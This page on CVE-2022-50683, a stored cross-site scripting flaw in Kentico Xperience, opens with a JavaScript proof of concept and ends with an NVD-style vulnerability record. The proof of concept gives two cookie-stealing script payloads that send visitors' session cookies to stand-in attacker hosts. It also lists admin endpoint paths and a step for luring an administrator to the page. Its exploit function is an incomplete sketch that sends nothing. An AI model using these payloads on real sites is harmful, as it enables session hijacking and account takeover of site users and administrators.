CVE-2022-50683

// CVE-2022-50683 Stored XSS PoC - Kentico Xperience Form Configuration // This PoC demonstrates exploiting the stored XSS via form redirect URL // Step 1: Identify the vulnerable endpoint // Typically found in CMS administration panel under Forms configuration // Step 2: Inject malicious script via form redirect URL field // Malicious payload: const maliciousPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'; // Step 3: Create a proof-of-concept script // Simulating the attack flow function exploitKenticoXperience(targetUrl, sessionCookie) { // Login with low-privilege account const loginEndpoint = `${targetUrl}/CMSModules/AdminControls/Pages/UIControls/Logon.aspx`; // Navigate to form settings const formSettingsEndpoint = `${targetUrl}/CMSModules/Forms/Controls/FormEdit.aspx`; // Inject XSS payload in redirect URL field // The vulnerable parameter is typically 'RedirectUrl' or similar const exploitData = { RedirectUrl: maliciousPayload, FormName: 'ContactForm', Save: true }; // When victim visits the form page, the script executes console.log('XSS payload stored successfully'); console.log('Payload will execute on page load for all visitors'); } // Step 4: Automate the exploitation const target = 'https://victim-kentico-site.com'; const attackerServer = 'https://attacker-controlled-server.com'; // Construct the stealing payload const stealCookiePayload = ` <img src=x onerror=" fetch('${attackerServer}/collect?cookie='+btoa(document.cookie)) "> `; console.log('Exploit: Inject the following payload in form redirect URL:'); console.log(stealCookiePayload); // Step 5: Social engineering - trick admin to visit the page // The XSS will fire when admin visits the affected form page

{"cve": {"id": "CVE-2022-50683", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:50.437", "lastModified": "2025-12-27T17:15:40.870", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form redirect URL configuration. This allows malicious scripts to execute in users' browsers through unvalidated form configuration settings."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.74", "matchCriteriaId": "549B8E66-5A7A-42C6-95D2-44B415DC7540"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-form-configuration-stored-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}